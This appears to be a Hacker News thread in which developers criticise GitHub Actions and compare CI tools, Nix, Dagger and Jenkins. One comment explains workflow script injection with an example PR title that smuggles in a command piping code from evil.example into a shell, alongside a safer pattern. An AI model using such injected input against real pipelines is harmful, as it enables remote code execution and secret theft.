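    steps:
      - uses: actions/checkout@v4
      - run: ./deploy.sh
        env:
          DEPLOY_TOKEN: ${{ secrets.DEPLOY_TOKEN }}  # environment secret
```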
I haven't used it but the GitHub Environments feature allows setting Secrets by Environment. Costs extra $ tho.
But for actually good security CI and CD should be different tools.
LilBytes 7 days ago [-]
Yeah, it's a difficult problem. Templates help; then put the templates into another repo that is managed by a specific person and imported into others. Not sure how that would work in a monorepo, I expect those controls wouldn't.
The problem is it's still possible to work around those controls unless you create some YAML monstrosity that stops people from making the mistake in the first place.
jonenst 7 days ago [-]
I'm surprised the author doesn't mention environment secrets, which I think currently are the only way to avoid that anyone with push access to any repo also gets full access to all secrets (by pushing a new workflow file and triggering it). This makes org and repo secrets practically useless for any team where only admins or maintainers should have access to secrets.
suryao 7 days ago [-]
There definitely are a ton of issues with GitHub actions. To add to the OP's list:
- Self-hosting on your aws/gcp/azure account can get a little tricky. `actions-runner-controller` is nice but runs your workflows within a docker container in k8s, which leads to complex handling for isolation, cost controls because of NAT etc.
- Multi-arch container builds require emulation and can be extremely slow by default.
- The cache limits are absurd.
- The macos runners are slow and overpriced (arguably, most of their runners are).
Over the last year, we spent a good amount of time solving many of these issues with WarpBuild[1]. Having unlimited cache sizes, remote multi-arch docker builders with automatic caching, and ability to self-host runners in your aws/gcp/azure account are valuable to minimize cost and optimize performance.
I've run into similar pain points with GitHub Actions in past roles but I still very much use them/get value. One approach that's helped us at Flox is indeed using Nix and we've now seen customers start leveraging that. Significant drop in “works on my machine” issues and more reliable CI pipelines, etc... It’s not a silver bullet, but it offers a solid technical foundation for tackling these challenges.
On the Flox side we are very much on the integrate and improve rather than full replace for scenarios like this one <3
Happy to answer any Nix items on this!
sontek 7 days ago [-]
I'm surprised that they were already using earthly and decided not to continue using it inside github actions. That is my favorite pattern so that what github actions is doing is the same as what I'd do locally. No `act` necessary:
I am really really hoping that someone (not me, I've already tried and failed) could slim it down into a single-purpose, self-contained, community maintainable tool ...
netvarun 7 days ago [-]
Dagger (https://dagger.io) recently seems to have reinvented/rebranded itself as some llm agent platform.
sepositus 7 days ago [-]
Oh no...this must have been recent. DevOps is hitting peak enshitification. I didn't have a plan B.
I just don't understand why people have gone down this CI-in-the-cloud path. I've been using some form of build scripts locally and then extending them to run on Jenkins as a standard flow for the longest time, and reproducibility is key. It always will be. If you have a generic script or tool that builds your project and people can just pick it up and read it, then it's going to be way easier to adopt and debug. Stop trying to use platforms with a DSL that break down the pieces in their proprietary way. It makes no sense.
klysm 7 days ago [-]
Write a script that works anywhere and execute it via your ci tooling as a thin wrapper
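As a sketch of that pattern (all names here are invented): one `ci.sh` holds the logic, and any CI system's config reduces to a single `./ci.sh <task>` step.

```shell
#!/bin/sh
# ci.sh -- hypothetical single entry point: all pipeline logic lives
# here, so the same tasks run on a laptop and under any CI system.
set -eu

RAN=""   # records which tasks ran, for the summary line below

lint()  { echo "linting...";       RAN="${RAN}L"; }  # swap in shellcheck, ruff, ...
build() { echo "building...";      RAN="${RAN}B"; }  # swap in make, cargo, docker, ...
tests() { echo "running tests..."; RAN="${RAN}T"; }  # 'test' is a shell builtin

case "${1:-all}" in
  lint)  lint ;;
  build) build ;;
  test)  tests ;;
  all)   lint; build; tests ;;
  *)     echo "unknown task: ${1}" >&2; exit 1 ;;
esac
echo "done: ${RAN}"
```

The CI config then contains nothing but something like `run: ./ci.sh test`, and a developer can run the identical command locally.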
rodolphoarruda 7 days ago [-]
Sidenote --
What a cool looking website. What kind of tool do you need to create those animations?
orliesaurus 7 days ago [-]
I am building Toolhouse.ai and I've had headaches with Github actions but luckily I ask the AI to help out when I am trying to do something.
My biggest annoyance is that it's oddly hard to debug things without running them. Even the GitHub Actions syntax helper in VSCode isn't super helpful. I have recently discovered `act`[1] and I will be investing time in using it because it hopefully makes a real difference.
I try to use as little of GHA specific things as possible. Use it as a runner but don't lock yourself into the platform. I want to be able to develop and run the CI outside GHA thank you very much.
_rm 6 days ago [-]
It seems that whenever something becomes good enough to become popular, you start the clock on people starting to write about how it's the worst thing ever.
solosito 4 days ago [-]
Did you consider Pkl instead of Yaml to write your GitHub actions?
If you want an easy solution for GitHub Actions security, check out Garnet.ai (formerly listen.dev). They were built for GitHub first. And it’s free for single projects - https://dashboard.listen.dev/.
belikebakar 6 days ago [-]
Does it allow integrating directly into the action runner?
fkjadoon94 6 days ago [-]
Yes, it's a one-step integration into your workflow file, typically placed before the steps you want to monitor (e.g. build, test) if you don't want to see everything happening in your runner host. It has worked pretty well with ubuntu-latest and stock Linux runners from GH out of the box.
fkjadoon94 6 days ago [-]
The integration basically wraps jibril, a single-binary Linux EDR, which allows for detection and enforcement in the runner.
Worst part of GitHub Actions? Its encouragement of the total misuse of containers as what have essentially become installer scripts - complete with all the flakiness you'd imagine.
Go look at your workflows and see how much of the runtime is spent running installers upon installers for various languages, package managers and so on. Containers were not supposed to be like this.
dzogchen 7 days ago [-]
Well the default GitHub images come with the kitchen sink, so for most projects you don’t need to install much if anything.
ris 7 days ago [-]
Yeah sure if you want to get zero guarantees about any of the versions of anything you're getting.
msy 7 days ago [-]
On a related note - how are people tracking the absolute thicket of permissions quirks that is Github's various secrets, tokens & repo permissions?
packetlost 7 days ago [-]
Most "CI" platforms suck in some way. I attribute it to a mix of misaligned incentives (less efficient pipelines, more premium-rate CPU cycles to resell, lockin, etc.) and the fact that it's actually just a hard problem.
I've found Actions and Codespaces to be different from one another. Actions recently came with a borked gcc compiler, which failed to build some code that was fine before, and there was no convenient way to debug this -- as in, no way for me to spin up exactly the same GH Actions environment in Codespaces.
Why not align these tools? Then there might be less pain. What a good idea.
kfarr 7 days ago [-]
I was updating an old action last night to update gh pages and it’s from peaceiris. And it’s not bad, it did the job. But it feels kinda weird.
sam_bristow 6 days ago [-]
Modern CI tends to grow features until it has reproduced all the features of a build system. You then end up with the actual logic of your build smeared across multiple layers, or contorting your CI setup to let the build system do caching etc. properly.
grav 7 days ago [-]
At [previous company], we initially required branches to be up to date with main.
Since it was a relatively big mono repo, it slowed down productivity quite a bit.
Eventually we tried dropping that requirement and instead relied on testing main before deploying to production. It sped us up again, and main never broke because of bad merges while I was there.
danfritz 7 days ago [-]
Not my experience, I have done fairly complex things like building / releasing a whitelabel ios and android app which is branded in ci per customer.
Like others have suggested, keep the actions simple by having lots of scripts which you can iterate on locally, and make the actions dumb wrappers that just run the scripts.
cantagi 7 days ago [-]
I have a problem with the Github Actions documentation. There is a lot of it, but it feels as though it was written from a "product" perspective, to explain how to use the product.
None of it usefully explains how GHA works from the ground up, in a way that would help me solve problems I encounter.
stuff4ben 6 days ago [-]
I still love my Jenkins Pipelines, Groovy shared libraries, and Bash scripts. It may be old, the UI may be a little crusty, but it's well understood, it just works, and I don't think much about the tool anymore.
jamesu 7 days ago [-]
One thing I found useful was writing a runner for Gitea's Actions CI, which is similar to GHA. When you dig down and ask "what is ACTUALLY happening to run this job", a lot of things -- such as the docker entrypoint not being modifiable -- make perfect sense.
gjohnhazel 7 days ago [-]
This was actually an extremely valuable article for me. I was unaware of act, the tool to test GH workflows locally, and your personal flow of using a separate branch to troubleshoot the YAML makes perfect sense.
TheRealPomax 7 days ago [-]
Is there a decent setup that one can run on their own server(s) instead? Because I'd much rather have a dedicated server sitting in a closet connected to fiber whose only job it is to be a CI runner.
Yep, after spending a few years with gitlab pipelines, my company started migrating over to dagger roughly mid-2024.
We moved to dagger to get replicable local pipeline runs, escape the gitlab DSL, and get the enormous benefits of caching.
We have explicitly chosen to avoid using the "daggerverse", and with that the cross-language stuff. Reason being that it makes modifying our pipeline slower and harder -- the opposite of the reason we moved to dagger.
So we use the Dagger python API to define and run our CI builds. It's great!
Like the other comments on this page about dagger, the move to "integrate AI" is highly concerning. I am hopeful that they won't continue down this path, but clearly the AI hype bubble is strong and at least some of the dagger team are inside it.
I'm speculating that if the dagger team doesn't drop the AI stuff, then the dagger project will end. A fork will pop up and we'll move to using that. I'm not an expert (yet!) in the buildkit API, but it seems like the stuff we're benefiting from with dagger is really just a thin wrapper around buildkit. So it's potentially not too challenging to create a drop-in replacement if necessary later.
AtNightWeCode 7 days ago [-]
Github Actions are simple things for tasks. I do btw also not like them.
But, there are so many red flags in this post. Clearly this corp does not know how to build, test and release professional software.
usrme 7 days ago [-]
To get around the horror that is YAML, I wholeheartedly recommend writing GitHub workflows in CUE and generating the required YAML out of them. I'm hopefully never going back to writing YAML myself!
glandium 7 days ago [-]
I'll take the occasion to ask the HN crowd: have you noticed that caches, on top of being limited to 10GB, don't seem to expire as advertised, in an LRU manner?
sylware 6 days ago [-]
On the pain side: is it "official" that github issues cannot be posted anymore with noscript/basic (x)html browsers?
acedTrex 7 days ago [-]
Github is too busy dumping all their engineering power into more useless copilot features than actually doing anything to improve their platform.
a1o 7 days ago [-]
I really urge people to try Cirrus CI, it's almost unknown but it has pretty amazing features!
itissid 7 days ago [-]
I can relate to this pain. Isn't gitlab CI better at this especially the documentation and simplicity of it?
toastal 7 days ago [-]
I can’t believe Forgejo ever thought it was a good idea to try & copy this nonsense. Rather than trying to be some FOSS MS GitHub clone, why not pitch that they can do things better—such as not having YAML spaghetti for CI.
I hope Actions stays bad tho. We need more folks to get off proprietary code forges for their open source projects—& a better CI + a better review model (PRs are awful) are 2 very low-hanging fruit that would entice folks off of the platform not for the philosophical reasons such as not supporting US corporations or endangering contributor privacy by making them agree to Microsoft’s ToS, but for technical superiority on the platform itself.
r3tr0 7 days ago [-]
we are working on a platform https://yeet.cx that lets you audit github actions pretty easily.
you just activate some probes and write SQL queries to sift through the information.
neuroelectron 6 days ago [-]
Building in the cloud seems like the worst possible thing you could do.
1a527dd5 7 days ago [-]
I just wish the default wasn't bash. GHA with pwsh is a much better experience.
ramesh31 7 days ago [-]
Half these problems and complexity could be solved with precommit hooks.
7 days ago [-]
eYrKEC2 7 days ago [-]
Has anyone used argo on kubernetes to automate their CI pipeline?
K3UL 7 days ago [-]
As someone who's been using it at very large scale, I still miss gitlab but I think they are not that bad.
But two major pains I did not see : the atrocious UI and the pricing.
Their pricing model goes against any good practice, as it counts a full minute for any job even if it runs for 2 seconds. Let's say you run 100 jobs in parallel and they all take 30 seconds: you will pay for 100 minutes instead of 50. Now translate this to an enterprise operating at big scale, and I assure you you'll see crazy differences between actual time and billable time.
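Spelling out that example's arithmetic (per-job billing rounds each run up to the next whole minute):

```shell
jobs=100
secs_per_job=30

actual_min=$(( jobs * secs_per_job / 60 ))             # 50 minutes of real compute
billed_min=$(( jobs * ( (secs_per_job + 59) / 60 ) ))  # each 30s job bills as 1 min

echo "actual: ${actual_min} min, billed: ${billed_min} min"
```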
bob1029 7 days ago [-]
Keeping the tech stack simple helps a lot with the CI/CD space. I still prefer to use custom tools that are part of the project source so I don't get locked in. This is like EC2 vs FaaS for me. I'll take the vanilla abstraction please.
Most of the time, I'm just running dotnet build to a zip file and s3 bucket. Then, some code or script picks it up on the other side. Things get much trickier when you're using multiple services, languages, runtimes, database technologies, etc.
Off-topic but DALL-E has turned the web into slop-city. What a mess. Everything looks the same, cheap and ugly and stupid.
rsanheim 7 days ago [-]
tl;dr: don't use GitHub Actions. It's a mess, the availability is often atrocious, and the UI around it is _still_ as clunky as when they first rolled it out many years ago.
There are better solutions out there.
asmor 7 days ago [-]
GitHub Actions is like Microsoft Teams. Nobody who knows better wants to use it, but it's slightly better than what most did before (email/jenkins/nothing) and came with the thing you're already using. At least your boss thinks it's better. And it's such a good deal!
ibejoeb 7 days ago [-]
Does anyone think GHA is better than Jenkins?
I was doing things more than 20 years ago in Hudson that GHA can't do now.
everfrustrated 7 days ago [-]
>Does anyone think GHA is better than Jenkins?
A 1000% yes, because it means the default experience most devs have of CI uses ephemeral runners, which is a massive win for security and against build rot.
Every company I've worked at with stateful runners was a security incident begging to happen, not to mention builds that would do different things depending on what runner host you got placed on (devs manually installing different versions of things on hosts, etc)
williamDafoe 7 days ago [-]
Does anyone use GHA - full stop? Their stuff seems "me too" in most cases, they are definitely a follower, like microsoft Bing search ... google AI ...
ashishb 7 days ago [-]
> There are better solutions out there.
And what are those?
rsanheim 7 days ago [-]
CircleCI.
mscrivo 7 days ago [-]
To expand on this, CircleCI lets you easily ssh into a run so you can debug it as if you were debugging it on your own machine. I cannot tell you how many times this has saved me countless hours because you don't need to wait for your changes to build and then subsequently fail repeatedly, drastically shortening the iteration cycle.
ashishb 7 days ago [-]
I used to use circle CI earlier.
GitHub Actions was an upgrade for me.
rattray 6 days ago [-]
why?
ashishb 5 days ago [-]
GitHub Actions, at least at that time, had a lot more coverage than circle CI.
Anda a lot more flexibility in terms of what can you do.
throwaway984393 7 days ago [-]
Drone.io
KronisLV 7 days ago [-]
Not sure why this was downvoted/flagged, I do use Drone CI myself currently and it's quite pleasant: https://www.drone.io/
There's also the Woodpecker CI fork, which has a very similar user experience: https://woodpecker-ci.org/
When combined with Docker images, it's quite pleasant to use - you define what environment you want for the CI/CD steps, what configuration/secrets you need and define the steps (which can also just be a collection of scripts that you can run locally if need be), that's it.
Standalone, so you can integrate it with Gogs, Gitea or similar solutions for source control and perhaps a bit simpler than GitLab CI (which I also think is lovely, though maintaining on-prem GitLab isn't quite a nice experience all the time, not that you have to do that).
ashishb 7 days ago [-]
Will it last another 2 years?
Several CI systems have come and gone.
williamDafoe 7 days ago [-]
The next time I want to program in YAML (which is NEVER) I'll use GitHub Actions......
cresolutejw 7 days ago [-]
[flagged]
simonw 7 days ago [-]
Definitely not a skill issue if you read the details in their post - https://www.feldera.com/blog/the-pain-that-is-github-actions - they're clearly very experienced with using GitHub Actions and have run into legitimate challenges due to the complexity of what they're using it for.
cresolutejw 7 days ago [-]
I did read the post. The documentation of the product does explain how to use it, so it is unfair to blame the product in my opinion.
simonw 7 days ago [-]
GitHub Actions may cover this stuff in the documentation but it's still difficult to use. That means the product could be designed better (and the documentation could be easier to follow.)
cresolutejw 7 days ago [-]
Why downvote me because there is discourse?
Couldn't we say most software could be documented better? I do not think GitHub Actions ranks near the bottom in terms of documentation and user experience overall. I do understand your point though.
SequoiaHope 7 days ago [-]
It would be more helpful for you to provide the solution rather than just boast about your intelligence.
cresolutejw 7 days ago [-]
The solution was found by the author, and is covered in GitHub actions documentation.
There's probably a lesson in there.
I swear by TeamCity. It doesn't seem to have any of these problems other people are facing with GitHub Actions. You can configure it with a GUI, or in XML, or using a type safe Kotlin DSL. These all actually interact so you can 'patch' a config via the GUI even if the system is configured via code, and TeamCity knows how to store config in a git repository and make commits when changes are made, which is great for quick things where it's not worth looking up the DSL docs or for experimentation.
The UI is clean and intuitive. It has all the features you'd need. It scales. It isn't riddled with insecure patterns like GH Actions is.
CI is just the thing no one wants to deal with, yet everyone wants to just work. And like any code or process, you need engineering to make it good. And like any project, you can't just blame bad tools for crappy results.
Whereas, I could articulate why I didn't like Jenkins just fine :)
The things I want to change I do in the build system, so they are checked in and available when we need to build previous versions (we are embedded, where field failure is expensive, so there are typically branches for the current release, the next release, and head). This also means anything that can fail in CI can fail on my local system (unless it depends on something like the number of cores on the machine running the build).
While the details can be slightly different, how we have CI is how it should be. Most developers should have better things to do than worry about how to configure CI.
(I don't recall _loving_ it, though I don't have as many bad memories of it as I do for VSTS/TFS, GitLab, GH Actions, Jenkins Groovyfiles, ...)
We needed two more or less completely different configurations for old a new versions of the same software (think hotfix for past releases), but TeamCity can't handle this scenario at all. So now we have duplicated the configuration and some hacky version checks that cancel incompatible builds.
Maybe their new Pipeline stuff fixes some of these shortcomings.
This is making me realize I want a CI with as few features as possible. If I'm going to spend months of my life debugging this thing I want as few corners to check as I can manage.
I tend to stick with the GUI because if you're doing JVM-style work the complexity and the tasks are all in the build you can run locally; the CI system is more about task scheduling, so it's not that hard to configure. But being able to migrate from GUI to code when the setup becomes complex enough to justify it is a very nice thing.
Any CI product play has to differentiate in a way that makes you dependent on them. Sure it can be superficially nicer when staying inside the guard rails, but in the age of docker why has the number of ways I configure running boring shell scripts gone UP? Because they need me unable to use a lunch break to say "fuck you I don't need the integrations you reserve exclusively for your CI" and port all the jobs back to cron.
And that's why jenkins is king.
If you make anything more than that, your CI will fail. And you can do that with Jenkins, so the people that did it saw it work. (But Jenkins can do so much more, which is the entire reason so many people have nightmares just hearing that name.)
We build Docker images mostly so ymmv.
I have a "port to github actions" ticket in the backlog but I think we're not going to go down that road now.
You'll have to explain the weird CPS transformations, you'll probably end up reading the Jenkins plugins' code, and there's nothing fun down this path.
Probably 'guerilla', but I like your version more.
Wikipedia: Gorilla Suit: National Gorilla Suit Day:
https://en.wikipedia.org/wiki/Gorilla_suit#National_Gorilla_...
Put the Gorilla back in National Gorilla Suit Day:
https://www.instagram.com/mad.magazine/p/C2xgmVqOjL_/
Gorilla Suit Day – January 31, 2026:
https://nationaltoday.com/gorilla-suit-day/
National Gorilla Suit Day:
https://www.youtube.com/watch?v=N2n5gAN3IlI
You can use Nix with GitHub Actions since there is a Nix GitHub action: https://github.com/marketplace/actions/install-nix. Every time the action is triggered, Nix rebuilds everything, but thanks to its caching (which needs to be configured), it only rebuilds targets that have changed.
> How do you automate running tests and deploying to dev on every push
Nix is a build tool and its main purpose is not to deploy artifacts. There are however a lot of tools to deploy artifacts built by Nix: https://github.com/nix-community/awesome-nix?tab=readme-ov-f...
Note there are also several Nix CI that can do a better job than a raw GitHub actions, because they are designed for Nix (Hydra, Garnix, Hercules, ...).
> How do you automate running tests
You just build the Nix derivation that runs your tests, e.g. `nix build .#tests` or `nix flake check` in your workflow file.
> deploying to dev on every push
You can set up a Nix `devShell` as a staging area for any operations you'd need to perform for a deployment. You can use the same devShell both locally and in CI. You'd have to inject any required secrets into the Action environment in your repository settings, still. It doesn't matter what your staging environment is comprised of, Nix can handle it.
Every CI "platform" is trying to seduce you into breaking things out into steps so that you can see their little visualizations of what's running in parallel or write special logic in groovy or JS to talk to an API and generate notifications or badges or whatever on the build page. All of that is cute, but it's ultimately the tail wagging the dog— the underlying build tool should be what is managing and ordering the build, not the GUI.
What I'd really like for next gen CI is a system that can get deep hooks into local-first tools. Don't make me define a bunch of "steps" for you to run, instead talk to my build tool and just display for me what the build tool is doing. Show me the order of things it built, show me the individual logs of everything it did.
Same thing with test runners. How are we still stuck in a world where the test runner has its own totally opaque parallelism regime and our only insight is whatever it chooses to dump into XML at the end, which will be probably be nothing if the test executable crashes? Why can't the test runner tell the CI system what all the processes are that it forked off and where each one's respective log file and exit status is expected to be?
Nix really helps with this. It's not just that you do everything via a single script invocation, local or CI; you do it in an identical environment, local or CI. You are not trying to debug the difference between Ubuntu as set up in GHA and Arch as it is on your laptop.
Setting up a nix build cache also means that any artefact built by your CI is instantly available locally which can speed up some workflows a lot.
- Everything sandboxed in containers (works the same locally and in CI)
- Integrate your build tools by executing them in containers
- Send traces, metrics and logs for everything at full resolution, in the OTEL format. Visualize in our proprietary web UI, or in your favorite observability tool
I work on garnix.io, which is exactly a Nix-based CI alternative for GitHub, and we had to build a lot of these small things to make the experience better.
All of that is a lot more than what a local dev would want, deploying to their own private test instance, probably with a bunch of API keys that are read-only or able to write only to other areas meant for validation.
Maybe add some semi-structured log/trace statements for the CI to scrap.
No hooks necessary.
How much better would it be if the CI web client could just say, here's everything the build tool built, with their individual logs, and here's a direct link to the one that failed, which canceled everything else?
But how do you get that sweet, sweet vendor-lock that way? /s
When I joined my first web SaaS startup I had a bit of a culture shock. Everything was running on 3rd party services with their own proprietary config/language/etc. The base knowledge of POSIX/Linux/whatever was almost completely useless.
I'm kinda used to it now, but I'm not convinced it's any better. There are so many layers of abstraction now that I'm not sure anybody truly understands it all.
It blows my mind what is involved in creating a simple web app nowadays compared to when I was a kid in the mid-2000s. Do kids even do that nowadays? I’m not sure I’d even want to get started with all the complexity involved.
If you want to use a framework, the React tutorials from Traversy Media are pretty good. You can even go cross-platform into mobile with frameworks like React Native or Flutter if you want iOS/Android native apps.
Vite has been a godsend for React/Vue. It's no longer the circus it was in the mid 2010s. Google's monopoly has made things easier for web devs. No more Babel or polyfills or create-react-app.
People do still avoid frameworks and use raw HTML/CSS/JavaScript. HTMX has made server fetches a lot easier.
You probably want a decent CSS framework for responsive design. Minimalist ones like Tailwind have become more popular than the heavyweight frameworks everyone used to use.
If you need a backend and want to do something simple you can use BaaS (Backend as a Service) platforms like Firebase. Otherwise setting up a NodeJS server with a SQL store like SQLite or a document store like MongoDB isn't too difficult.
CI/CD systems exist to streamline testing and deployment for large complex apps. But for individual hobbyist projects it’s not worth it.
It’s demonstrably worse.
> The base knowledge of POSIX/Linux/whatever was almost completely useless.
Guarantee you, 99% of the engineering team there doesn’t have that base knowledge to start with, because of:
> There are so many layers of abstraction now that I'm not sure anybody truly understands it all.
Everything is constantly on fire, because everything is a house of cards made up of a collection of XaaS, all of which are themselves houses of cards written by people similarly clueless about how computers actually operate.
I hate all of it.
Your Jenkins experience is more valuable and worth replicating when you get the opportunity.
Once you get on Dagger, you can turn your CI into minimal Dagger invocations and write the logic in the language of your choice. Runs the same locally and in automation
I personally use Dagger a bit differently from most, by writing a custom CLI and using the Dagger Go SDK directly. This allows you to do more host-level commands, as everything in a Dagger session runs in a container (builds and arbitrary commands).
I've adopted the mono/megarepo organization and have a pattern that also includes CUE in the solution. Starting to write that up here: https://verdverm.com/topics/dev/dx
Between that and upgrading for security patches, developing user-impacting code is becoming a smaller and smaller part of software development.
I heavily invested in a local runner based CI/CD workflow. First I was using gogs and drone, now the forgejo and woodpecker CI forks.
It runs with multiple redundancies because it's a pretty easy setup to replicate on decentralized hardware. The only thing that's a little painful is authentication and cross-system pull requests, so we still need our single point of failure to merge feature branches and do code reviews.
Due to us building everything in Go, we also decided to always have a /toolchain/build.go so that we have everything in a single language, and don't even need bash in our CI/CD podman/docker images. We just use FROM scratch, with Go, and that's it. The only exception being when we need to compile/rebuild our eBPF kernel modules.
To me, personally, the GitHub Actions CVE from August 2024 was the final nail in the coffin. I blogged about it in more technical detail [1] and guess what the reason was that the tj-actions were compromised last week? Yep, you guessed it: the same attack surface that GitHub refuses to fix, a year later.
The only tool, as far as I know, that somehow validates against these kinds of vulnerabilities is zizmor [2]. All other tools validate schemas, not vulnerabilities and weaknesses.
[1] https://cookie.engineer/weblog/articles/malware-insights-git...
[2] https://github.com/woodruffw/zizmor
If you take a look at the pull requests in e.g. the changed-files repo, it's pretty obvious what happened. You can still see some of the malformed git branch names and other things that the bots tried out. There were lots of "fixes" that just changed environment variable names from PAT_TOKEN to GITHUB_TOKEN and similar things afterwards, which kind of just delays the problem until malware is executed with a different code again.
As a snarky sidenote: The Wiz article about it is pretty useless as a forensics report, I expected much more from them. [1]
The conceptual issue is that this is not fixable unless github decides to rewrite their whole CI/CD pipeline, because of the arbitrary data sources that are exposed as variables in the yaml files.
The proper way to fix this (as GitHub) would be to implement a mandatory linter step or similar, and let a tool like zizmor check the workflow file. If it fails, refuse to run the workflow.
[1] https://www.wiz.io/blog/github-action-tj-actions-changed-fil...
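For readers who haven't seen this class of bug: GitHub Actions expands `${{ ... }}` expressions into the script text before execution, so any workflow that interpolates attacker-controlled event data into a `run:` block is injectable. A hypothetical illustration (not the actual tj-actions payload):

```yaml
# Vulnerable: a PR title like `"; curl https://evil.example | sh #`
# becomes part of the shell script itself.
- name: vulnerable
  run: echo "PR title: ${{ github.event.pull_request.title }}"

# Safer: route the value through an environment variable, so the shell
# receives it as data rather than code.
- name: safer
  env:
    PR_TITLE: ${{ github.event.pull_request.title }}
  run: echo "PR title: $PR_TITLE"
```

This is the pattern zizmor's template-injection audit is designed to flag.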
Mise can install all your deps, and run tasks
From dagger.io...
"The open platform for agentic software.
Build powerful, controllable agents on an open ecosystem. Deploy agentic applications with complete visibility and cross-language capabilities in a modular, extensible platform.
Use Dagger to modernize your CI, customize AI workflows, build MCP servers, or create incredible agents."
So now we are trying to capitalize on it, hence the ongoing changes to our website. We are trying to avoid the "something something agents" effect, but clearly, we still have work to do there :) It's hard to explain in marketing terms why an ephemeral execution engine, cross-language component system, deep observability and interactive CLI can be great at running both types of workloads... But we're going to keep trying!
Internally we never thought of ourselves as a CI company, but as an operating system company operating in the CI market. Now we are expanding opportunistically to a new market: AI agents. We will continue to support both, because our platform can run both.
If you are interested, I shared more details here: https://x.com/solomonstre/status/1895671390176747682
The risk of muddling is limited to the marketing, though. It's the exact same product powering both use cases. We would not even consider this expansion if it wasn't the case.
For example, Dagger Cloud implements a complete tracing suite (based on OTEL). Customers use it for observability of their builds and tests. Well it turns out, you can use the exact same tracing product for observability of AI agents too. And it turns out that observability is a huge unresolved problem for AI agents! The reason is that, fundamentally, AI agents work exactly like complicated builds: the LLM is building its state, one transformation at a time, and sometimes it has side effects along the way via tool calling. That is exactly what Dagger was built for.
So, although we are still struggling to explain this reality to the market: it is actually true that the Dagger platform can run both CI and AI workflows, because they are built on the same fundamentals.
Or I'll ask v0.dev to reimplement it, but I think it'd be more complete if you did it
I can understand what you're trying to say, but because I don't have clear "examples" at hand which show me why in practice handling such cases is problematic and why your platform makes that smooth, I don't "immediately" see the value added
For me right now, the biggest "value-added" that I perceive from your platform is just the "CI/CD as code", a bit the same as say Pulumi vs Terraform
But I don't see clearly the other differences that you mention (eg observability is nice, but it's more "sugar" on top, not a big thing)
I have the feeling that indeed the clean handling of "state" vs "side-effects" (and what it implies for caching / retries / etc) is probably the real value here, but I fail to perceive it clearly (mostly because I probably don't (or not yet) have those issues in my build pipelines)
If you were to give a few examples / ELI5 of this, it would probably help convert more people (eg: I would definitely adopt a "clean by default" way of doing things if I knew it would help me down the road when some new complex-to-handle use-cases will inevitably pop up)
They do seem to have a nice "quickstart for CI" they haven't abandoned, yet: https://docs.dagger.io/ci/quickstart
(As much as I personally like working with CI and build systems, it's true there's not a ton of money in it!)
Literally from comment at the root of this thread.
https://www.boringbusinessnerd.com/startups/dagger
Mise indeed isn't, but its scope is quite a bit smaller than Dagger.
A lot of us could learn... do one thing and do it well
    target:
        $(DOCKER_PREFIX) build

When run in GitLab, the DOCKER_PREFIX is a no-op (it's literally empty due to the CI=true var), and the 'build' command (whatever it is) runs in the CI/CD docker image. When run locally, it effectively is a `docker run -v $(pwd):$(pwd) build`.
It's really convenient for ensuring that if it builds locally, it can build in CI/CD.
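The same prefix trick can be sketched in plain shell (the image name and build command here are placeholders, not from the parent comment's setup):

```shell
# Empty prefix in CI (the job already runs inside the right image);
# a docker-run prefix locally, so both paths execute the same command.
if [ "${CI:-false}" = "true" ]; then
  DOCKER_PREFIX=""
else
  DOCKER_PREFIX="docker run --rm -v $PWD:$PWD -w $PWD build-image"
fi
echo "would run: $DOCKER_PREFIX make build"
```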
I let GitHub actions do things like the initial environment configuration and the post-run formatting/annotation, but all of the actual work is done by my scripts:
https://github.com/Hammerspoon/hammerspoon/blob/master/.gith...
https://github.com/williamcotton/webdsl/blob/main/.github/wo...
The other thing I would add is consider passing in all environment variables as args. This makes it easy to see what dependencies the script actually needs, and has the bonus of being even more portable.
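A minimal sketch of that suggestion, with hypothetical names: every input arrives as an explicit argument, so the script documents its own dependencies and runs identically locally and in CI.

```shell
set -eu

# All configuration comes in as arguments; nothing is read from the
# ambient environment, so the call site shows every dependency.
deploy() {
  env_name="$1"    # e.g. staging or prod
  image_tag="$2"   # e.g. v1.2.3
  echo "deploying ${image_tag} to ${env_name}"
}

deploy staging v1.2.3
```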
Some people here still can’t believe YAML is used for not only configuration, but complex code like optimized CI pipelines. This is insane. You’re actually introducing much needed sanity into the process by admitting that a real programming language is the tool to use here.
I can’t imagine the cognitive dissonance Lisp folks have when dealing with this madness, not being one myself.
After a decade trying to fight it, this one Lisper here just gave up. It was the only way to stay sane.
I remain hopeful that some day, maybe within our lifetimes, the rapid inflation phase of software industry will end, and we'll have time to rethink and redo the fundamentals properly. Until then, one can at least enjoy some shiny stuff, and stay away from the bleeding edge, aka. where sewage flows out of pipe and meets the sea.
(It's gotten a little easier now, as you can have LLMs deal with YAML-programming and other modern worse-is-better "wisdom" for you.)
It would really benefit from a language that intrinsically understood that it is being used to control a state machine. As it is, what nearly all folks want in practice is a way to run different things based on different states of CI.
A Lisp DSL would be perfect for this. Macros would make things a lot easier in many respects.
Unfortunately, there's no industry consensus and none of the big CI platforms have adopted support for anything like that, they all use variants of YAML (I always wondered who started it with YAML and why everyone copied that, if anyone knows I'd love to read about it).
Honestly, I can say the same complaints hold up against the cloud providers too. Those 'infrastructure as code' SDKs really don't lean into the 'as code' part very well
"Application and configuration should be separate, ideally in separate repos. It is the admin's job to configure, not the developer's"
"I do not need to learn your garbage language to understand how to deploy or test your application"
"...as a matter of fact, I don't need to learn the code and flows of the application itself either - give me a binary that runs. But it should work with stale configs in my repo."
"...I know language X works for the application but we need something more ubiquitous for infra"
Then there was a crossover of three streams, as I would call it:
YAML was emerging "hard" on the shoulders of Rails
Everyone started hating on XML (and for a good reason)
Folks working on CI services (CruiseControl and other early solutions) and ops tooling (chef, ansible) saw JSON's shortcomings (now an entire ecosystem has configuration files with no capability to put in a comment)
Since everybody hated each other's languages, the lowest common denominator for "configuration code" came out to be YAML, and people begrudgingly agreed to use it
The situation then escalated severely with k8s, which adopted YAML as "the" configuration language, and a whole ecosystem of tooling sprung up on top using textual templating (!) of YAML as a layer of abstraction. For k8s, having a configuration language was an acute need, because with a compiled language you need something for configuration that you don't have to compile with the same toolchain just to use - and I perfectly "get it" why they settled for YAML. I also get why tools like Helm were built on top of YAML trickery - had Helm been written in some other language, with its charts using that language, it would have alienated all the developers who either hate that language personally or don't have it on their org's list of "golden permitted" languages.
Net result is that YAML was chosen not because it is good, but because it is universally terrible in the same way for everyone, and people begrudgingly settled on it.
With CI there is an extra twist that a good CI setup functions as a DAG - some tasks can - and should - run in parallel for optimization. These tasks produce artifacts which can be cached and reused, and a well-set CI pipeline should be able to make use of that.
